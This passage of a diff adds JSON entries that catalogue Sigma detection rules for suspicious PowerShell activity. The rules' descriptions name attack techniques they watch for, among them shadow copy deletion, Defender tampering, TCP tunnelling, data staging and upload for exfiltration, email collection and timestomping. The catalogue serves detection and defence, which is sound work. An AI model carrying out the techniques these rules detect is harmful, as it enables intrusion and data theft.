"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071.001" + ] + }, + "uuid": "d4488827-73af-4f8d-9244-7b7662ef046e", + "value": "Change User Agents with WebRequest" + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct 
access read of the first few bytes of the volume.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_iofilestream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream" + }, + { + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "meta": { + "author": "Florian Roth, Perez Diego (@darkquassar)", + "creation_date": "2019/02/11", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_keywords.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", + "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "value": "Suspicious PowerShell Keywords" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help 
adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_local_group_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_local_group_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "value": "Suspicious Get Local Groups Information - PowerShell" + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information.\nFiles containing email data can be acquired from a users local system, such as Outlook storage or cache files.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_mail_acces.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mail_acces.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114.001" + ] + }, + "uuid": "2837e152-93c8-43d2-85ba-c3cd3c2ae614", + "value": "Powershell Local Email Collection" + }, + { + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/08", + "falsepositive": [ + "Administrators or Power users may remove their shares via cmd line" + ], + "filename": "posh_ps_susp_mounted_share_deletion.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.005" + ] + }, + "uuid": "66a4d409-451b-4151-94f4-a55d559c49b0", + "value": "PowerShell Deleted Mounted Share" + }, + { + "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_mount_diskimage.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", + "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "29e1c216-6408-489d-8a06-ee9d151ef819", + "value": "Suspicious Mount-DiskImage" + }, + { + "description": "Adversaries with no prior knowledge of 
legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_networkcredential.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_networkcredential.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110.001" + ] + }, + "uuid": "1883444f-084b-419b-ac62-e0d0c5b3693f", + "value": "Suspicious Connection to Remote Account" + }, + { + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). 
The adversary may then perform actions as the logged-on user.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_new_psdrive.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_new_psdrive.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "value": "Suspicious New-PSDrive to Admin Share" + }, + { + "description": "Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_proxy_scripts.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1090" + ] + }, + "uuid": "bd33d2aa-497e-4651-9893-5c5364646595", + "value": "Suspicious TCP Tunnel Via PowerShell Script" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + 
"filename": "posh_ps_susp_recon_export.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_recon_export.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "value": "Recon Information for Export with PowerShell" + }, + { + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_remove_adgroupmember.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "48a45d45-8112-416b-8a67-46e03a4b2107", + "value": "Remove Account From Domain Admin Group" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/24", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "22d80745-6f2c-46da-826b-77adaededd74", + "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS" + }, + { + "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as\na precursor for Collection and to identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/15", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_smb_share_reco.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, 
+ "uuid": "95f0643a-ed40-467c-806b-aac9542ec5ab", + "value": "Suspicious Get Information for SMB Share" + }, + { + "description": "Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_susp_ssl_keyword.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", + "value": "Suspicious SSL Connection" + }, + { + "description": "Powershell use PassThru option to start in background", + "meta": { + "author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_start_process.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "uuid": 
"0718cd72-f316-4aa2-988f-838ea8533277", + "value": "Suspicious Start-Process PassThru" + }, + { + "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "meta": { + "author": "frack113", + "creation_date": "2022/02/01", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_unblock_file.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.005" + ] + }, + "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", + "value": "Suspicious Unblock-File" + }, + { + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_wallpaper.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" + ], + "tags": [ + "attack.impact", + "attack.t1491.001" + ] + }, + "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", + "value": 
"Replace Desktop Wallpaper by Powershell" + }, + { + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/23", + "falsepositive": [ + "Admin script" + ], + "filename": "posh_ps_susp_win32_pnpentity.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1120" + ] + }, + "uuid": "b26647de-4feb-4283-af6b-6117661283c5", + "value": "Powershell Suspicious Win32_PnPEntity" + }, + { + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", + "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "meta": { + "author": "frack113", + "creation_date": "2021/10/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_windowstyle.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.003" + ] + }, + "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "value": "Suspicious PowerShell WindowStyle Option" + }, + { + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 
'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/16", + "falsepositive": [ + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" + ], + "filename": "posh_ps_susp_write_eventlog.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "value": "PowerShell Write-EventLog Usage" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" + }, + { + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", + "creation_date": "2020/10/05", + "falsepositive": [ + "App-V 
clients" + ], + "filename": "posh_ps_syncappvpublishingserver_exe.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + }, + { + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "meta": { + "author": "frack113, elhoim", + "creation_date": "2022/01/16", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "value": "Tamper Windows Defender - ScriptBlockLogging" + }, + { + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_tamper_defender_remove_mppreference.yml", + "level": 
"high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" + }, + { + "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_test_netconnection.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1571" + ] + }, + "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", + "value": "Testing Usage of Uncommonly Used Port" + }, + { + "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files 
that are in the same folder.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/08/03", + "falsepositive": [ + "Legitimate admin script" + ], + "filename": "posh_ps_timestomp.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "c6438007-e081-42ce-9483-b067fbef33c3", + "value": "Powershell Timestomp" + }, + { + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/18", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_trigger_profiles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1546.013" + ] + }, + "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "value": "Powershell Trigger Profiles by Add_Content" + }, + { + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_upload.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", 
+ "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "value": "Windows PowerShell Upload Web Request" + }, + { + "description": "Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/17", + "falsepositive": [ + "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + ], + "filename": "posh_ps_user_discovery_get_aduser.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", + "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services", + "Rare FP could occure due to the non linearity of the ScriptBlockText log" + ], + "filename": "posh_ps_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
